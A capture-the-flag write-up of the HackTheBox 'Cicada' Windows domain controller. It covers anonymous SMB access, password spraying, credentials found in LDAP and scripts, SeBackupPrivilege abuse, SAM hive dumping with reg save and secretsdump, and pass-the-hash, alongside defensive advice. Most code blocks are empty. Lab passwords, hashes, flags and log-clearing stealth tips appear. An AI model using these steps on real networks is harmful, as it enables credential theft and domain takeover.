Machine Information#
- Name: Cicada
- IP: 10.129.231.149
- OS: Windows Server 2022 Build 20348
- Difficulty: Easy
- Release Date: September 26, 2024
- Creator: @theblxckcicada
- Domain: cicada.htb
Table of Contents#
Reconnaissance#
Initial Nmap Scan#
| |
Results:
| |
Analysis:
- This is a Windows Domain Controller
- WinRM (5985) is open - potential for remote management
- SMB (445) is open - check for anonymous access
- LDAP (389/636) is available - can enumerate domain information
- Domain name: cicada.htb
Add Domain to Hosts File#
| |
Enumeration#
Step 1: SMB Share Enumeration (Anonymous Access)#
Check for accessible SMB shares without authentication:
| |
Explanation: The -N flag suppresses the password prompt, attempting anonymous/guest authentication.
Results:
| |
Key Finding: HR share is accessible anonymously! This is a critical misconfiguration.
Step 2: Access HR Share#
| |
Download all files from the share:
| |
File Retrieved: Notice from HR.txt
Contents:
| |
Critical Finding: Default password exposed: Cicada$M6Corpb*@Lp#nZp!8
Explanation: Organizations sometimes use default passwords for new employees. This is a severe security risk if:
- The password is documented in accessible locations
- Users don’t change it immediately
- It’s the same for multiple accounts
Initial Foothold#
Step 3: RID Brute Force - User Enumeration#
We have a password but no username. Let’s enumerate domain users using RID brute forcing.
What is RID Brute Forcing?
- Every Windows user has a Security Identifier (SID)
- Format:
S-1-5-21-{domain}-{RID} - RID (Relative Identifier) increments sequentially: 500, 501, 502, etc.
- We can query RIDs via SMB to discover usernames
- Even guest/anonymous access allows this
Command:
| |
Alternative commands (all work):
| |
Results - Domain Users Discovered:
| |
Key Users Identified:
- john.smoulder
- sarah.dantelia
- michael.wrightson
- david.orelious
- emily.oscars
Step 4: Password Spraying#
Create a user list and spray the default password:
| |
Password Spray Attack:
| |
Explanation:
- Password spraying tries one password against multiple users
--continue-on-successkeeps testing after finding valid credentials- This is safer than brute forcing (fewer lockouts)
Result:
| |
Success! Valid credentials found: michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
Lateral Movement#
Step 5: Authenticated SMB Enumeration#
Check what shares Michael can access:
| |
Results:
| |
Note: DEV share shows “NO ACCESS” in smbmap, but let’s verify with ldapdomaindump.
Step 6: LDAP Domain Dump#
Use authenticated LDAP access to gather comprehensive domain information:
| |
Explanation: ldapdomaindump queries LDAP and creates HTML reports with:
- All domain users
- User descriptions (often contain passwords!)
- Group memberships
- Computer accounts
- Domain policies
Files Created:
- domain_users.html
- domain_users.json
- domain_groups.html
- domain_computers.html
- etc.
Step 7: Finding Second Set of Credentials#
Examine the domain_users.json for interesting information:
| |
Critical Finding in David Orelious’s Account:
| |
Explanation: Storing passwords in user descriptions is a critical security flaw. Admins sometimes do this for “convenience” but it’s visible to any authenticated user via LDAP.
New Credentials Found: david.orelious:aRt$Lp#7t*VQ!3
Step 8: Testing WinRM Access with David’s Credentials#
| |
Result:
| |
Failed! David doesn’t have WinRM access. Let’s check the DEV share instead.
Step 9: Accessing DEV Share with David’s Credentials#
| |
Success! David can access the DEV share.
Commands in SMB:
| |
Step 10: Analyzing Backup Script#
File: Backup_script.ps1
Contents:
| |
Critical Finding: Hardcoded credentials in the script!
- Username:
emily.oscars - Password:
Q!3@Lp#M6b*7t*Vt
Explanation: Embedding credentials in scripts is a common but dangerous practice. This is especially risky when scripts are stored in accessible shares.
Step 11: Testing Emily’s Credentials#
| |
Result:
| |
Success! Emily has WinRM access. The “(Pwn3d!)” indicator means we can get a shell!
Step 12: Getting Initial Shell#
| |
Explanation: Evil-WinRM uses the WinRM protocol (Windows Remote Management) to get a PowerShell session. It requires:
- Valid credentials
- User must be in “Remote Management Users” group
- WinRM service must be running (port 5985/5986)
Success! We’re in:
| |
Step 13: Getting User Flag#
| |
User Flag: ff94c460876f705c2f45270e5ae4b076
Privilege Escalation#
Step 14: Enumerate User Privileges#
Check what permissions Emily has:
| |
Key Findings:
| |
Critical Privileges:
- Backup Operators Group: Built-in privileged group
- SeBackupPrivilege: Can read ANY file on the system, bypassing ACLs
- SeRestorePrivilege: Can write to ANY location on the system
Explanation:
- Backup Operators is designed for backup software
- SeBackupPrivilege lets backup tools read files even when ACLs deny access
- This is essentially a “read-anything” privilege
- We can abuse this to read the Administrator’s files or dump password hashes
Method 1: Easy Root Flag Retrieval#
The quickest way to get the root flag is using robocopy with backup mode:
| |
Explanation:
robocopyis Windows’ robust file copy utility/bflag enables “backup mode” which leverages SeBackupPrivilege- This bypasses NTFS permissions and ACLs
- We can copy files we normally can’t access
Root Flag: 6e2b72509a4ecbb85b1e7df87cce9c7f
Method 2: Full Administrator Access (Pass-the-Hash)#
For complete system compromise, we’ll extract the Administrator password hash.
Step 15: Set Up SMB Server on Attacker Machine#
On your Kali machine:
| |
Explanation: We need a network share to exfiltrate the registry hives. The SMB server will receive the files from the Windows machine.
Step 16: Dump Registry Hives#
Back in your Evil-WinRM session:
| |
Explanation:
- SYSTEM hive: Contains the SYSKEY (encryption key for SAM)
- SAM hive: Security Account Manager database with password hashes
- reg save: Windows command to export registry hives
- SeBackupPrivilege allows us to read these protected registry keys
- We exfiltrate them via SMB to our Kali machine
Actual Commands Used:
| |
Step 17: Extract Password Hashes#
On Kali, fix permissions and extract hashes:
| |
Explanation:
secretsdump.pyis an Impacket tool- It uses the SYSTEM key to decrypt the SAM database
- Extracts NTLM password hashes for all local users
Results:
| |
Administrator Hash: 2b87e7c93a3e8a0ea4a581937016f341
Explanation of Hash Format:
- First part (aad3b435…): LM hash (legacy, usually empty)
- Second part (2b87e7c9…): NTLM hash (what we need)
- NTLM hashes can be used directly for authentication (Pass-the-Hash)
Step 18: Pass-the-Hash Attack#
Use the Administrator hash to get a privileged shell:
| |
Explanation - Pass-the-Hash:
- Windows authenticates using NTLM hashes
- We don’t need the plaintext password
- The hash can be used directly for authentication
- This is why hash extraction is so powerful
Alternative with psexec:
| |
Success! Administrator Shell:
| |
Step 19: Retrieve Root Flag#
| |
Root Flag: 6e2b72509a4ecbb85b1e7df87cce9c7f
Flags#
User Flag#
Location: C:\Users\emily.oscars.CICADA\Desktop\user.txt
Flag: ff94c460876f705c2f45270e5ae4b076
Root Flag#
Location: C:\Users\Administrator\Desktop\root.txt
Flag: 6e2b72509a4ecbb85b1e7df87cce9c7f
Attack Chain Summary#
| |
Key Takeaways#
Vulnerabilities Exploited#
Anonymous SMB Access (CWE-284)
- HR share accessible without authentication
- Contained sensitive default password documentation
Weak Password Management (CWE-521)
- Single default password used for multiple new hires
- Password documented in accessible location
- No forced password change on first login
Information Disclosure via RID Enumeration (CWE-200)
- Guest/anonymous account could enumerate all domain users
- Enabled username discovery for password spraying
Password in User Description (CWE-522)
- David Orelious’s password stored in LDAP description field
- Visible to any authenticated domain user
- Critical OPSEC failure
Hardcoded Credentials (CWE-798)
- Backup script contained plaintext credentials
- Script stored in accessible SMB share
- No encryption or secure storage
Excessive Privileges (CWE-269)
- Emily.oscars added to Backup Operators group unnecessarily
- SeBackupPrivilege allows reading any file on the system
- Enabled privilege escalation to Administrator
Inadequate Access Controls (CWE-732)
- DEV share contained sensitive scripts
- Accessible by regular domain users
- Should be restricted to administrators only
Tools Used#
| Tool | Purpose | Key Commands |
|---|---|---|
| nmap | Port scanning | nmap -sC -sV -oA scan target |
| smbclient | SMB share access | smbclient //host/share -U user |
| smbmap | SMB enumeration | smbmap -u user -p pass -H host |
| netexec/crackmapexec | SMB/WinRM testing | nxc smb host -u user -p pass --rid-brute |
| ldapdomaindump | LDAP enumeration | ldapdomaindump host -u 'domain\user' -p pass |
| evil-winrm | WinRM shell | evil-winrm -i host -u user -p pass |
| impacket-smbserver | SMB server | impacket-smbserver share /path -smb2support |
| secretsdump.py | Hash extraction | secretsdump.py -sam SAM -system SYSTEM LOCAL |
| robocopy | File copy w/ backup mode | robocopy /b source dest file |
| reg save | Registry export | reg save HKLM\SAM file |
Defense Recommendations#
Immediate Actions#
โ Remove anonymous SMB access
- Disable guest account
- Require authentication for all shares
- Command:
net user guest /active:no
โ Disable RID enumeration
- Configure registry to restrict anonymous SID/Name translation
- Set
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymousto 2
โ Clean up password exposures
- Remove passwords from user descriptions
- Audit all LDAP attributes for sensitive data
- Remove hardcoded credentials from scripts
โ Review group memberships
- Remove users from Backup Operators unless absolutely necessary
- Audit all privileged group memberships
- Implement just-in-time (JIT) access
Long-term Improvements#
โ Implement LAPS (Local Administrator Password Solution)
- Randomizes local admin passwords
- Stores them securely in AD
- Auto-rotates on schedule
โ Password Policy Enforcement
- Eliminate default passwords
- Force password change on first logon
- Implement password complexity requirements
- Use Group Policy: Computer Configuration โ Windows Settings โ Security Settings
โ Credential Management
- Use Windows Credential Manager
- Implement Azure Key Vault or similar
- Never store passwords in scripts or descriptions
- Use service accounts with minimal privileges
โ SMB Hardening
- Enable SMB signing (prevents relay attacks)
- Disable SMBv1 (deprecated and insecure)
- Implement share-level permissions carefully
- Commands:
1 2Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
โ Privilege Monitoring
- Monitor SeBackupPrivilege usage
- Alert on registry hive access
- Implement Windows Event Log monitoring
- Watch for Event IDs: 4672, 4673, 4697
โ Network Segmentation
- Separate Domain Controllers from user networks
- Implement firewall rules
- Use VLANs for different security zones
โ Regular Security Audits
- Scan for anonymous SMB shares
- Review LDAP attributes for sensitive data
- Audit privileged group memberships
- Penetration testing quarterly
Active Directory Best Practices#
Principle of Least Privilege
- Users should have minimum necessary permissions
- Use temporary privilege elevation when needed
- Regular access reviews
Secure Administrative Practices
- Use separate admin accounts for privileged tasks
- Never log into workstations with domain admin accounts
- Implement Protected Users group
Password Protection
- Deploy LAPS for local administrators
- Use long, complex passwords (15+ characters)
- Implement password rotation policies
- Consider passwordless authentication (FIDO2, Windows Hello)
Monitoring and Detection
- Enable advanced threat protection (ATP)
- Monitor for suspicious LDAP queries
- Alert on unexpected privilege escalations
- Implement SIEM (Security Information and Event Management)
Pentester Notes#
Enumeration Checklist#
- Anonymous SMB access (
smbclient -L -N) - RID brute force (
nxc smb --rid-brute) - LDAP anonymous bind (
ldapsearch -x -H ldap://target) - Password spraying (one password, many users)
- Check user descriptions for passwords
- Look for backup files, scripts, configs in shares
- Test WinRM access (
nxc winrm)
Privilege Escalation Checklist#
- Check
whoami /privfor dangerous privileges - SeBackupPrivilege โ Dump SAM/SYSTEM
- SeDebugPrivilege โ Process injection
- SeImpersonatePrivilege โ Potato exploits
- Check group memberships (
whoami /groups) - Backup Operators โ Read any file
- Account Operators โ Create admin users
Key Windows Privileges to Watch For#
| Privilege | Abuse Method | Impact |
|---|---|---|
| SeBackupPrivilege | Dump registry hives | Read Administrator hash |
| SeRestorePrivilege | Write to protected locations | Persistence |
| SeDebugPrivilege | Process injection | SYSTEM access |
| SeImpersonatePrivilege | Token impersonation | SYSTEM access |
| SeTakeOwnershipPrivilege | Take file ownership | Access any file |
| SeLoadDriverPrivilege | Load malicious driver | Kernel access |
Quick Reference Commands#
Complete Attack Path#
| |
One-Liner Enumeration Script#
| |
Additional Attack Vectors (Not Used But Available)#
Kerberoasting#
If we had domain credentials, we could extract service account hashes:
| |
AS-REP Roasting#
Check for accounts without Kerberos pre-authentication:
| |
BloodHound Enumeration#
Map the entire AD environment:
| |
NTDS.dit Extraction (Domain Controller)#
Since this is a DC, we could dump all domain hashes:
| |
Lessons Learned#
For Blue Team#
Detection Opportunities:
Anonymous SMB Access
- Event ID 5140 (Share accessed)
- Monitor for guest/anonymous account usage
RID Brute Force
- Multiple SAMR queries from single IP
- Event ID 4798 (User SID enumeration)
Password Spray
- Multiple failed logons with same password
- Event ID 4625 (Failed logon)
- Look for same source IP hitting multiple accounts
LDAP Queries
- Unusual LDAP attribute queries
- Event ID 1644 (LDAP searches)
SeBackupPrivilege Abuse
- Event ID 4673 (Sensitive privilege use)
- Registry hive access from non-system accounts
- Unusual robocopy usage
Pass-the-Hash
- Logon Type 3 with NTLM
- Event ID 4624 (Successful logon) with LogonType 3
- No Kerberos tickets generated
For Red Team#
Stealth Improvements:
- Use smaller user lists for password spraying (avoid lockouts)
- Add delays between authentication attempts
- Use compromised domain machines for attacks (blend with normal traffic)
- Prefer Kerberos over NTLM when possible
- Clean up artifacts (temp files, event logs if possible)
- Use legitimate admin tools (Living Off The Land)
Alternative Techniques:
- Use PowerShell instead of compiled tools
- Leverage LOLBAS binaries
- In-memory execution to avoid disk writes
- Use native Windows tools (net, wmic, powershell)
Real-World Implications#
How This Happens in Corporate Environments#
Default Passwords
- HR departments create documentation for new hires
- IT uses same password for efficiency
- Users don’t change passwords immediately
- Documentation stored in accessible locations
Password in Descriptions
- Help desk stores passwords for “reference”
- Service account documentation
- Legacy practices from pre-LAPS era
Hardcoded Credentials in Scripts
- Backup scripts need credentials
- Developers prioritize functionality over security
- Scripts shared across teams
- No secrets management solution
Over-Privileged Accounts
- “Just in case” permissions
- Inherited from previous admin
- No regular access reviews
- Convenience over security
Impact Assessment#
If this were a real environment:
| Asset | Impact | Risk Level |
|---|---|---|
| Domain Admin Access | Complete network compromise | CRITICAL |
| User Credentials | Lateral movement capability | HIGH |
| Business Data | Potential data exfiltration | HIGH |
| Email Access | Phishing from internal accounts | HIGH |
| File Shares | Access to confidential documents | MEDIUM |
| Workstations | Deploy ransomware/malware | CRITICAL |
Potential Business Impact:
- Ransomware deployment across entire domain
- Data breach (customer PII, financial records)
- Intellectual property theft
- Regulatory fines (GDPR, HIPAA, etc.)
- Reputation damage
- Business interruption
Estimated Remediation Time:
- Immediate: 2-4 hours (disable compromised accounts)
- Short-term: 1-2 weeks (fix vulnerabilities)
- Long-term: 1-3 months (implement security controls)
Advanced Topics#
Understanding SeBackupPrivilege#
Technical Details:
- Part of Windows Backup and Restore privileges
- Bypasses DACL (Discretionary Access Control List)
- Can read files even with DENY ACLs
- Required for volume shadow copy operations
- Commonly assigned to Backup Operators group
API Calls Used:
OpenProcessToken()- Get process tokenLookupPrivilegeValue()- Get privilege LUIDAdjustTokenPrivileges()- Enable privilegeBackupRead()- Read files with privilege
Abuse Methods:
- Registry hive dumping (SAM, SYSTEM, SECURITY)
- NTDS.dit extraction (Domain Controller)
- Reading protected files (credentials, config files)
- Volume Shadow Copy access
Detection:
| |
Pass-the-Hash Explained#
How It Works:
- Windows stores password hashes in SAM/LSASS
- NTLM authentication uses hash, not plaintext
- Server challenges client with random nonce
- Client encrypts nonce with NTLM hash
- Server verifies response
Why It’s Effective:
- No need to crack the hash
- Hash is the credential
- Works across network protocols (SMB, WinRM, RDP)
- Persists until password is changed
Mitigations:
- Disable NTLM, use Kerberos only
- Enable Credential Guard
- Use Protected Users group
- Implement LAPS
- Network segmentation
Conclusion#
The Cicada machine demonstrates a realistic Active Directory penetration testing scenario. The attack chain exploited multiple common misconfigurations:
- โ Anonymous SMB access led to information disclosure
- โ Weak password management enabled initial access
- โ Poor credential hygiene facilitated lateral movement
- โ Excessive privileges allowed privilege escalation
Key Takeaway: Security is only as strong as its weakest link. A single misconfiguration (anonymous SMB) led to complete domain compromise.
Final Checklist#
What We Accomplished:
- Enumerated domain users via RID brute force
- Found default password in accessible share
- Discovered credentials in LDAP descriptions
- Extracted credentials from backup scripts
- Gained WinRM access as domain user
- Abused SeBackupPrivilege for privilege escalation
- Extracted Administrator hash from SAM
- Performed Pass-the-Hash attack
- Retrieved both user and root flags
- Achieved complete domain compromise
Resources and References#
Documentation#
- Microsoft: Active Directory Security Best Practices
- NIST: Active Directory Security
- MITRE ATT&CK: Active Directory Techniques
Tools#
Further Learning#
- CRTP - Certified Red Team Professional
- CRTO - Certified Red Team Operator
- HackTricks - Windows Local Privilege Escalation
- PayloadsAllTheThings - Active Directory
Vulnerable by Design Labs#
- HackTheBox Pro Labs (Dante, Offshore, RastaLabs)
- TryHackMe AD rooms
- PentesterLab AD courses
- GOAD (Game of Active Directory)
Credits#
Machine Creator: @theblxckcicada
Platform: HackTheBox
Writeup Author: Based on actual penetration test
Date Pwned: November 14, 2025
Appendix: Full Command Log#
| |
End of Writeup
I hope this was helpful
Posted:
Time since posted: calculating...
System.Motivation.Load()
